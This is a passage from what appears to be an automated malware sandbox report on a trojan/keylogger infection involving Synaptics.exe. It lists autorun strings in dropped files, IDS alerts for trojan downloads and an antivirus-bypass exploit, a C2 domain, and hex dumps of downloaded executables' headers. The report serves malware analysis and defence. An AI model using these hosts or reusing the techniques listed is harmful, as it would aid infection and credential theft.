                      Source: Synaptics.exe, 00000003.00000003.1717667109.0000000000763000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                      Source: Synaptics.exe, 00000003.00000003.1717667109.0000000000763000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                      Source: 2.exe.0.drBinary or memory string: [autorun]
                      Source: 2.exe.0.drBinary or memory string: [autorun]
                      Source: 2.exe.0.drBinary or memory string: autorun.inf
                      Source: RCXF308.tmp.3.drBinary or memory string: [autorun]
                      Source: RCXF308.tmp.3.drBinary or memory string: [autorun]
                      Source: RCXF308.tmp.3.drBinary or memory string: autorun.inf
                      Source: 1[1].exe.0.drBinary or memory string: [autorun]
                      Source: 1[1].exe.0.drBinary or memory string: [autorun]
                      Source: 1[1].exe.0.drBinary or memory string: autorun.inf
                      Source: Synaptics.exe.1.drBinary or memory string: [autorun]
                      Source: Synaptics.exe.1.drBinary or memory string: [autorun]
                      Source: Synaptics.exe.1.drBinary or memory string: autorun.inf
                      Source: 1.exe.0.drBinary or memory string: [autorun]
                      Source: 1.exe.0.drBinary or memory string: [autorun]
                      Source: 1.exe.0.drBinary or memory string: autorun.inf
                      Source: HjsFu2ta.exe.3.drBinary or memory string: [autorun]
                      Source: HjsFu2ta.exe.3.drBinary or memory string: [autorun]
                      Source: HjsFu2ta.exe.3.drBinary or memory string: autorun.inf
                      Source: ~$cache1.3.drBinary or memory string: [autorun]
                      Source: ~$cache1.3.drBinary or memory string: [autorun]
                      Source: ~$cache1.3.drBinary or memory string: autorun.inf
                      Source: RCXF376.tmp.3.drBinary or memory string: [autorun]
                      Source: RCXF376.tmp.3.drBinary or memory string: [autorun]
                      Source: RCXF376.tmp.3.drBinary or memory string: autorun.inf
                      Source: RCXF181.tmp.1.drBinary or memory string: [autorun]
                      Source: RCXF181.tmp.1.drBinary or memory string: [autorun]
                      Source: RCXF181.tmp.1.drBinary or memory string: autorun.inf
                      Source: 2[1].exe.0.drBinary or memory string: [autorun]
                      Source: 2[1].exe.0.drBinary or memory string: [autorun]
                      Source: 2[1].exe.0.drBinary or memory string: autorun.inf
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0040A2B0 GetDesktopWindow,FindFirstFileA,FileTimeToSystemTime,realloc,FindNextFileA,FindClose,qsort,SetFileAttributesA,SetFileAttributesA,DeleteFileA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,free,2_2_0040A2B0
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00407D50 SendMessageA,FindFirstFileA,realloc,FindNextFileA,FindClose,SetFileAttributesA,DeleteFileA,??3@YAXPAX@Z,free,Sleep,2_2_00407D50
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DCF9B3 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,8_2_00DCF9B3
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DDDB70 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,8_2_00DDDB70
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,9_2_00D2BA94
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,9_2_00D3D420
                      Source: C:\Windows\wic.exeCode function: 11_2_00F3E027 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen,11_2_00F3E027
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BC940B FindFirstFileExA,18_2_00BC940B
                      Source: C:\Program Files (x86)\1.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Program Files (x86)\1.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Program Files (x86)\1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                      Source: C:\Program Files (x86)\1.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Program Files (x86)\1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                      Source: C:\Program Files (x86)\1.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: excel.exeMemory has grown: Private usage: 2MB later: 69MB

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49730 -> 47.254.187.72:80
                      Source: Network trafficSuricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 47.254.187.72:80 -> 192.168.2.4:49730
                      Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:49738 -> 69.42.215.252:80
                      Source: Network trafficSuricata IDS: 2800781 - Severity 1 - ETPRO EXPLOIT Microsoft Windows Shell Buffer Overflow : 47.254.187.72:80 -> 192.168.2.4:49740
                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49845 -> 142.250.186.142:443
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: xred.mooo.com
                      Uses dynamic DNS services
                      Source: unknownDNS query: name: freedns.afraid.org
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: AliyunOSSDate: Thu, 02 Jan 2025 19:34:49 GMTContent-Type: application/octet-streamContent-Length: 830976Connection: keep-alivex-oss-request-id: 6776EA59FDD725252BC4B43BAccept-Ranges: bytesETag: "D026CFE00B08DA14B0A8B7F8860887D7"Last-Modified: Sat, 02 Nov 2024 18:51:16 GMTx-oss-object-type: Normalx-oss-hash-crc64ecma: 3464722037212978174x-oss-storage-class: Standardx-oss-ec: 0048-00000109Content-Disposition: attachmentx-oss-force-download: trueContent-MD5: 0CbP4AsI2hSwqLf4hgiH1w==x-oss-server-time: 2Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 9c 09 00 00 0e 03 00 00 00 00 00 80 ab 09 00 00 10 00 00 00 b0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 0d 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 42 2a 00 00 00 00 0b 00 30 05 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 80 a9 00 00 00 00 00 00 00 00 00 00 18 40 0a 00 21 00 00 00 00 00 00 00 00 00 00 00 00 40 0a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 ec 9b 09 00 00 10 00 00 00 9c 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 54 2e 00 00 00 b0 09 00 00 30 00 00 00 a0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e5 11 00 00 00 e0 09 00 00 00 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 42 2a 00 00 00 00 0a 00 00 2c 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*@@B*0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: AliyunOSSDate: Thu, 02 Jan 2025 19:34:50 GMTContent-Type: application/octet-streamContent-Length: 4645376Connection: keep-alivex-oss-request-id: 6776EA5A40E6AE0DD7C69331Accept-Ranges: bytesETag: "85A57509DB3E9DFA7B4E451B8243220D"Last-Modified: Sat, 02 Nov 2024 19:15:45 GMTx-oss-object-type: Normalx-oss-hash-crc64ecma: 11212801109602397947x-oss-storage-class: Standardx-oss-ec: 0048-00000109Content-Disposition: attachmentx-oss-force-download: trueContent-MD5: haV1Cds+nfp7TkUbgkMiDQ==x-oss-server-time: 4Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 9c 09 00 00 42 3d 00 00 00 00 00 80 ab 09 00 00 10 00 00 00 b0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 47 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 42 2a 00 00 00 00 0b 00 78 39 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 80 a9 00 00 00 00 00 00 00 00 00 00 18 40 0a 00 21 00 00 00 00 00 00 00 00 00 00 00 00 40 0a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 ec 9b 09 00 00 10 00 00 00 9c 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 54 2e 00 00 00 b0 09 00 00 30 00 00 00 a0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e5 11 00 00 00 e0 09 00 00 00 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 42 2a 00 00 00 00 0a 00 00 2c 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*B=@@G@B*x9<
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: AliyunOSSDate: Thu, 02 Jan 2025 19:34:54 GMTContent-Type: application/octet-streamContent-Length: 9872Connection: keep-alivex-oss-request-id: 6776EA5E6069439A00C5A68BAccept-Ranges: bytesETag: "1EDB88F9EE745EAAEE2CBD8219318EB0"Last-Modified: Sat, 02 Nov 2024 15:18:39 GMTx-oss-object-type: Normalx-oss-hash-crc64ecma: 9658441509656194699x-oss-storage-class: Standardx-oss-ec: 0048-00000109Content-Disposition: attachmentx-oss-force-download: trueContent-MD5: HtuI+e50XqruLL2CGTGOsA==x-oss-server-time: 2Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e1 46 52 f6 a5 27 3c a5 a5 27 3c a5 a5 27 3c a5 e3 76 e3 a5 a7 27 3c a5 e3 76 dc a5 a7 27 3c a5 ac 5f af a5 a0 27 3c a5 a5 27 3d a5 b8 27 3c a5 a8 75 dd a5 a4 27 3c a5 a8 75 e2 a5 a4 27 3c a5 52 69 63 68 a5 27 3c a5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3a ce ab 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 20 00 00 00 10 00 00 00 80 00 00 80 a5 00 00 00 90 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 00 00 00 10 00 00 00 00 00 00 02 00 40 87 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 80 00 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 20 00 00 00 90 00 00 00 18 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 b0 00 00 00 02 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$FR'<'<'<v'<v'<_'<'='<u'<u'<Rich'<PEL:f @@
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: AliyunOSSDate: Thu, 02 Jan 2025 19:34:55 GMTContent-Type: application/octet-streamContent-Length: 346414Connection: keep-alivex-oss-request-id: 6776EA5FFDD725252BC4B67AAccept-Ranges: bytesETag: "39E7BE73C7531AC895F75834FDC1BCD6"Last-Modified: Sat, 02 Nov 2024 18:37:48 GMTx-oss-object-type: Normalx-oss-hash-crc64ecma: 12059760812609244457x-oss-storage-class: Standardx-oss-ec: 0048-00000109Content-Disposition: attachmentx-oss-force-download: trueContent-MD5: Oee+c8dTGsiV91g0/cG81g==x-oss-server-time: 2Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 16 c9 9a 88 77 a7 c9 88 77 a7 c9 88 77 a7 c9 3c eb 56 c9 85 77 a7 c9 3c eb 54 c9 06 77 a7 c9 3c eb 55 c9 90 77 a7 c9 08 0c 5a c9 8a 77 a7 c9 08 0c a3 c8 9b 77 a7 c9 08 0c a4 c8 9f 77 a7 c9 08 0c a2 c8 bd 77 a7 c9 81 0f 24 c9 83 77 a7 c9 81 0f 34 c9 8f 77 a7 c9 88 77 a6 c9 92 76 a7 c9 06 0c a2 c8 b9 77 a7 c9 06 0c a7 c8 89 77 a7 c9 06 0c 58 c9 89 77 a7 c9 06 0c a5 c8 89 77 a7 c9 52 69 63 68 88 77 a7 c9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b2 cf c8 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 21 00 2e 03 00 00 f6 03 00 00 00 00 00 90 07 02 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 07 00 00 04 00 00 00 00 00 00 02 00 40 c1 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 80 e3 03 00 34 00 00 00 b4 e3 03 00 50 00 00 00 00 60 06 00 74 d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 07 00 dc 23 00 00 b0 c1 03 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 66 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 78 02 00 00 5c d8 03 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cc 2d 03 00 00 10 00 00 00 2e 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d0 b1 00 00 00 40 03 00 00 b2 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 50 47 02 00 00 00 04 00 00 12 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 a4 01 00 00 00 50 06 00 00 02 00 00 00 f6 03 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$www<Vw<Tw<UwZwwww$w4wwvwwXwwRichwPELd!.@@p@4
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: AliyunOSSDate: Thu, 02 Jan 2025 19:34:56 GMTContent-Type: application/octet-streamContent-Length: 3483648Connection: keep-alivex-oss-request-id: 6776EA6054F7EDD933C5AA70Accept-Ranges: bytesETag: "6AD65B03E75BC5509BA3104510178EE6"Last-Modified: Sat, 02 Nov 2024 15:06:38 GMTx-oss-object-type: Normalx-oss-hash-crc64ecma: 12551179916436374333x-oss-storage-class: Standardx-oss-ec: 0048-00000109Content-Disposition: attachmentx-oss-force-download: trueContent-MD5: atZbA+dbxVCboxBFEBeO5g==x-oss-server-time: 2Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 ad 33 d9 23 cc 5d 8a 23 cc 5d 8a 23 cc 5d 8a 46 aa 5e 8b 3d cc 5d 8a 46 aa 59 8b 05 cc 5d 8a 46 aa 58 8b c4 cc 5d 8a 46 aa 5b 8b 20 cc 5d 8a 71 a4 59 8b 01 cc 5d 8a 71 a4 5e 8b 3a cc 5d 8a 71 a4 58 8b 5f cd 5d 8a 46 aa 5c 8b 06 cc 5d 8a 23 cc 5c 8a 35 cf 5d 8a 88 a5 54 8b 20 cc 5d 8a 88 a5 a2 8a 22 cc 5d 8a 23 cc ca 8a 22 cc 5d 8a 88 a5 5f 8b 22 cc 5d 8a 52 69 63 68 23 cc 5d 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fb 3e 26 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 10 00 1a 18 00 00 52 1d 00 00 00 00 00 09 ba 14 00 00 10 00 00 00 30 18 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 35 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 5b 1d 00 7c 01 00 00 00 50 1e 00 c0 13 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 33 00 88 32 02 00 90 bf 1b 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 c0 1b 00 18 00 00 00 00 c0 1b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 18 00 08 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 19 18 00 00 10 00 00 00 1a 18 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 86 62 05 00 00 30 18 00 00 64 05 00 00 1e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 a4 00 00 00 a0 1d 00 00 5e 00 00 00 82 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 13 15 00 00 50 1e 00 00 14 15 00 00 e0 1d 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$g3#]#]#]F^=]FY]FX]F[ ]qY]q^:]qX_]F\]#\5]T ]"]#"]_"]Rich#]PEL>&gR0@5@[
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: AliyunOSSDate: Thu, 02 Jan 2025 19:35:00 GMTContent-Type: application/octet-streamContent-Length: 295424Connection: keep-alivex-oss-request-id: 6776EA64494A37041BC6A984Accept-Ranges: bytesETag: "9FD7C0ACC95C7F1311BDE279D0B6A03A"Last-Modified: Sat, 02 Nov 2024 13:26:13 GMTx-oss-object-type: Normalx-oss-hash-crc64ecma: 13157587370901313456x-oss-storage-class: Standardx-oss-ec: 0048-00000109Content-Disposition: attachmentx-oss-force-download: trueContent-MD5: n9fArMlcfxMRveJ50LagOg==x-oss-server-time: 2Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d b7 62 8a 09 d6 0c d9 09 d6 0c d9 09 d6 0c d9 7a b4 0f d8 04 d6 0c d9 7a b4 09 d8 a0 d6 0c d9 7a b4 08 d8 1f d6 0c d9 5b be 0f d8 1e d6 0c d9 7a b4 0d d8 00 d6 0c d9 09 d6 0d d9 82 d6 0c d9 5b be 09 d8 49 d6 0c d9 5b be 08 d8 28 d6 0c d9 a2 bf 05 d8 08 d6 0c d9 a2 bf f3 d9 08 d6 0c d9 a2 bf 0e d8 08 d6 0c d9 52 69 63 68 09 d6 0c d9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 73 22 26 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 10 00 18 03 00 00 76 01 00 00 00 00 00 2c 3a 01 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 47 04 00 3c 00 00 00 00 90 04 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 04 00 4c 2a 00 00 c0 18 04 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 19 04 00 18 00 00 00 30 19 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 03 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0b 16 03 00 00 10 00 00 00 18 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2a 22 01 00 00 30 03 00 00 24 01 00 00 1c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 60 04 00 00 12 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 02 00 00 00 90 04 00 00 04 00 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Mbzzz[z[I[(RichPELs"&gv,:0@@xG<
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: AliyunOSSDate: Thu, 02 Jan 2025 19:35:01 GMTContent-Type: application/octet-streamContent-Length: 208896Connection: keep-alivex-oss-request-id: 6776EA6554F7EDD933C5ACFBAccept-Ranges: bytesETag: "5E3BC49297F0765C486693790157273F"Last-Modified: Sat, 02 Nov 2024 13:26:13 GMTx-oss-object-type: Normalx-oss-hash-crc64ecma: 2028005770612052367x-oss-storage-class: Standardx-oss-ec: 0048-00000109Content-Disposition: attachmentx-oss-force-download: trueContent-MD5: XjvEkpfwdlxIZpN5AVcnPw==x-oss-server-time: 2Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 73 dc f1 b2 12 b2 a2 b2 12 b2 a2 b2 12 b2 a2 71 1d ed a2 b5 12 b2 a2 71 1d ef a2 a7 12 b2 a2 b2 12 b3 a2 67 13 b2 a2 95 d4 cf a2 ab 12 b2 a2 95 d4 df a2 23 12 b2 a2 95 d4 dc a2 c5 12 b2 a2 95 d4 c0 a2 b0 12 b2 a2 95 d4 c8 a2 b3 12 b2 a2 95 d4 ce a2 b3 12 b2 a2 95 d4 ca a2 b3 12 b2 a2 52 69 63 68 b2 12 b2 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b8 06 26 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 00 02 00 00 20 01 00 00 00 00 00 42 dc 00 00 00 10 00 00 00 10 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 